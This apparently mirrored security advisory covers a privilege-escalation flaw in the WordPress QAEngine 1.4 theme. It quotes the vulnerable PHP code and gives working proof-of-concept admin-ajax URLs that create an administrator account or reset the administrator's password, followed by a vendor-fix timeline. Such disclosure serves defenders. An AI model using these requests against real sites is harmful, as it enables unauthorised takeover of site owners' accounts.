Vulners
Lucene search
WordPress QAEngine Theme 1.4 Privilege Escalation
`[-] Theme Link:
https://www.enginethemes.com/themes/qaengine/
[-] Vulnerability Description:
[+] 1st Vulnerability:
qaengine vulnerability allows an attacker to have an administrator account
on the target's website
vuln code in /qaengine/includes/aecore/class-ae-users.php:
public function insert( $user_data ){
if( !$user_data['user_login'] || !preg_match('/^[a-z\d_]{2,20}$/i',
$user_data['user_login']) ) {
return new WP_Error( 'username_invalid', __("Username only
lowercase letters (a-z) and numbers are allowed.", ET_DOMAIN) );
}
/**
* insert user by wp_insert_user
*/
$result = wp_insert_user( $user_data ); ....
its inserting a new user using user input ( $user_data )
the function is being accessed from the sync function
public function sync($request) {
extract( $request );
unset($request['method']);
switch ( $method ) {
case 'create':
$result = $this->insert( $request );
break;
case 'update':
$result = $this->update( $request );
break;
case 'remove':
$result = $this->delete( $request['ID'] );
break;
case 'read':
$result = $this->get( $request['ID'] );
break;
default :
return new WP_Error('invalid_method', __("Invalid method",
ET_DOMAIN) );
}
return $result;
}
and the sync function can be accessed through ajax
$this->add_ajax('ae-sync-user', 'sync');
and since there is no third parameter in add_ajax setting 'nopriv' to true
this can be accessed only by registered users
public function add_ajax($hook, $callback, $priv = true, $no_priv = true,
$priority = 10, $accepted_args = 1 ){
if ( $priv )
$this->add_action( self::AJAX_PREFIX . $hook, $callback,
$priority, $accepted_args );
if ( $no_priv )
$this->add_action( self::AJAX_NOPRIV_PREFIX . $hook, $callback,
$priority, $accepted_args );
}
Proof of Concept:
accessing this by a registered user will insert a new user with username
(xADMIN) and password (xPASS) and an administrator role
localhost/wp/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator
response:
{"success":true,"data":{"action":"ae-sync-user","user_login":"xADMIN","user_pass":"xPASS","role":"administrator","ID":5},"msg":"Update
user successful!"}
[+] 2nd Vunerability:
and another vulnerability in update function
public function update( $user_data ){
....
$result = wp_update_user( $user_data );
...
}
this will allow the attacker to update any user(including administrator)
information like password,email,etc...
Proof of Concept:
the id parameter is the id of the user to be modified (usually 1 will be
the administrator)
localhost/wp/wp-admin/admin-ajax.php?action=ae-sync-user&method=update&ID=1&user_pass=ANOTHERPASSWORD
Response:
{"success":true,"data":{"ID":"1","user_login":"admin","user_nicename":"admin","user_email":
...
[-] Timeline:
22 March - Vendor Notified
23 March - Vendor Replied & Fix Released
07 April - Public Disclosure
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Apr 2015 00:00Current
0.4Low risk
Vulners AI Score0.4